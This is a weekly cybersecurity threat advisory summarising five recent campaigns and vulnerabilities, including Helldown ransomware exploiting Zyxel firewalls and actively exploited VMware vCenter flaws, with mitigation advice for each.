Helldown Ransomware Exploits Zyxel VPN Flaw to Target Corporate Networks

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include the emergence of the Helldown ransomware, which exploits Zyxel firewall vulnerabilities (CVE-2024-42057) to steal data and encrypt devices in small and medium-sized enterprises, and the active exploitation of critical VMware vCenter Server flaws (CVE-2024-38812 and CVE-2024-38813) for remote code execution and privilege escalation. Sophisticated espionage campaigns by TAG-110, a Russian-linked group, have been uncovered, deploying HATVIBE and CHERRYSPY malware to target Central Asia and Europe. Meanwhile, BrazenBamboo, linked to China’s APT41, leverages a zero-day vulnerability in Fortinet’s FortiClient to steal VPN credentials and sensitive data. Additionally, PXA Stealer, a Python-based malware, has targeted educational institutions and governments in Europe and Asia, using phishing emails and PowerShell scripts to exfiltrate data. These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Helldown Ransomware Exploits Zyxel VPN Flaw to Target Corporate Networks

Helldown ransomware exploits vulnerabilities in Zyxel firewalls, particularly CVE-2024-42057, to breach corporate networks, exfiltrate data, and encrypt devices. Targeting small and medium-sized firms, attackers use Zyxel’s IPSec VPN for access, creating malicious accounts and disabling defenses to move laterally across networks. The malware’s basic yet effective encryptors have disrupted operations for victims in the U.S. and Europe, with some paying ransoms. Researchers have linked Helldown to private, n-day exploits and unpatched vulnerabilities in MIPS-based Zyxel devices.

Recommendation to mitigate this threat include updating Zyxel firewalls to firmware 5.39 or later, monitoring network traffic for suspicious SSL VPN connections, and reviewing logs for unusual administrative activities. Multi-factor authentication and restricted privileged access are advised to minimize risks, along with advanced endpoint protection to detect ransomware activity. Regular audits and employee awareness campaigns against phishing can further bolster defenses. These measures are crucial to mitigate ongoing threats from Helldown.

2. Cyber Espionage Warning: DEEPDATA Malware Leverages Fortinet VPN Vulnerability

BrazenBamboo, a sophisticated threat group linked to China’s APT41, has exploited a zero-day vulnerability in Fortinet’s FortiClient for Windows as part of its modular cyber-espionage framework, DEEPDATA. This advanced toolkit, connected to other surveillance tools like LightSpy, targets messaging platforms, VPN credentials, and sensitive data, posing a serious threat to organizations. Despite reporting the flaw, Fortinet has not yet released a patch.

Recommendations to mitigate this threat include blocking indicators of compromise (IoCs) associated with DEEPDATA, DEEPPOST, and LightSpy in firewalls, IDS/IPS, and SIEM systems, while updating threat intelligence feeds. Network segmentation and advanced monitoring tools like EDR should be implemented to detect unusual activities and malicious DLL injections. To secure communications, multi-factor authentication (MFA) is advised, alongside training employees to avoid phishing and untrusted downloads. Organizations should update incident response plans for threats like DEEPDATA and conduct forensic analysis on compromised systems for containment and recovery.

3. New Python-Based PXA Stealer Exploits Credentials Across Europe and Asia

A Vietnamese-speaking threat actor is conducting an information-stealing campaign using PXA Stealer, a Python-based malware targeting sensitive data such as online credentials, VPN/FTP client data, browser cookies, financial details, and gaming software information. The campaign has impacted government and educational institutions in Europe and Asia, with evidence linking the attacker to Vietnamese Telegram channels marketing tools for account theft. The malware leverages phishing emails, a Rust-based loader, and PowerShell scripts to bypass antivirus defenses and deploy the stealer.

Recommendations to mitigate this include implementing advanced email filters to detect phishing attempts and educating users about suspicious emails. Robust endpoint protection and regular system updates are crucial to mitigate PowerShell-based attacks. Two-factor authentication (2FA) should secure critical accounts, while browser extensions can block unauthorized cookie access. Monitoring logs for unusual PowerShell activity and network traffic to suspicious domains can help identify breaches. Compromised systems should be isolated promptly, and thorough incident analysis conducted to remove malware remnants and secure affected accounts.

4. VMware vCenter Server Vulnerabilities Actively Exploited, Updated Patches Released

Broadcom has identified active exploitation of two VMware vCenter Server vulnerabilities: CVE-2024-38812 (critical RCE, CVSS 9.8) and CVE-2024-38813 (privilege escalation, CVSS 7.5). Affecting VMware vSphere and VMware Cloud Foundation, these flaws enable remote code execution via heap overflow and privilege escalation to root through crafted network packets. While VMware initially released patches in September 2024, the patch for CVE-2024-38812 was incomplete, prompting an updated patch release.

Recommendations include applying the latest VMware patches immediately, as no workarounds exist. Affected versions include VMware vCenter Server 7.0 and 8.0 and VMware Cloud Foundation 4.x, 5.x, and 5.1.x, with patched versions available as of the updated release. Administrators should monitor systems for unusual network activity and ensure timely deployment of these updates to prevent exploitation. Broadcom’s supplemental advisory provides guidance on patch application and addressing related issues.

5. TAG-110 Launches Sophisticated Attacks Using HATVIBE and CHERRYSPY

Threat actors with Russian ties, identified as TAG-110, have conducted cyber-espionage campaigns since 2021, targeting government entities, human rights groups, and educational institutions in Central Asia, East Asia, and Europe. Using custom malware tools HATVIBE (a loader) and CHERRYSPY (a Python-based backdoor), the group exploits phishing emails and web-facing vulnerabilities to infiltrate systems, monitor activity, and exfiltrate sensitive data. These campaigns align with Russia’s geopolitical objectives and efforts to influence post-Soviet states and destabilize NATO-aligned nations.

Researchers recommend implementing intrusion detection systems (IDS/IPS) and monitoring for indicators of compromise (IoCs), including specific C2 domains and IPs. Prompt patching of vulnerabilities, especially CVE-2024-23692, is crucial. Organizations should deploy robust endpoint detection and response (EDR) solutions, enforce multi-factor authentication (MFA), and provide phishing awareness training. Sharing IoCs with regional cybersecurity agencies can strengthen collective defenses against TAG-110’s persistent and strategic attacks.